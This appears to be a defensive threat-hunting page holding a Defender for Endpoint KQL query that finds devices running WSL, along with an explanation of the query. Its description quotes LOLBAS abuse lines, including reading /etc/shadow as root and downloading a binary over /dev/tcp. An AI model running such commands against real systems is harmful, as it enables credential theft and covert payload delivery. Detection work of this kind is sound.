WSL Installations

# List devices that have WSL installed ## Query Information #### Description Windows Subsystem for Linux may be used by adversaries to perform actions as root, or to download files. This query lists all devices that have WSL installed and it was active in the last 30 days. This may give an indidcation about the usage in your environment. Microsoft recommends listing WSL, if there is no scenario you explicitly require them. WSL Should be installed in the folder: C:\Windows\System32\wsl.exe. From the Lolbas project some suspicious queries that can be executed by WSL are: ``` wsl.exe -u root -e cat /etc/shadow wsl.exe --system calc.exe wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' ``` #### References - https://learn.microsoft.com/en-us/windows/wsl/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules ## Defender For Endpoint ``` let WSLDevices = DeviceProcessEvents | where Timestamp > ago(30d) | where FileName == "wsl.exe" | distinct DeviceId; DeviceInfo | where DeviceId in (WSLDevices) | summarize arg_max(Timestamp, *) by DeviceId ```

Explanation

This query lists all devices that have Windows Subsystem for Linux (WSL) installed and were active in the last 30 days. WSL is a feature that allows running Linux command-line tools on Windows. The query looks for instances of the "wsl.exe" file, which is the executable for WSL, and retrieves the unique device IDs. It then retrieves device information for those IDs and summarizes the latest information for each device. The purpose of this query is to identify devices with WSL installed, which could potentially be used by adversaries for malicious activities.

KQL Search

Query

Explanation

Details

Actions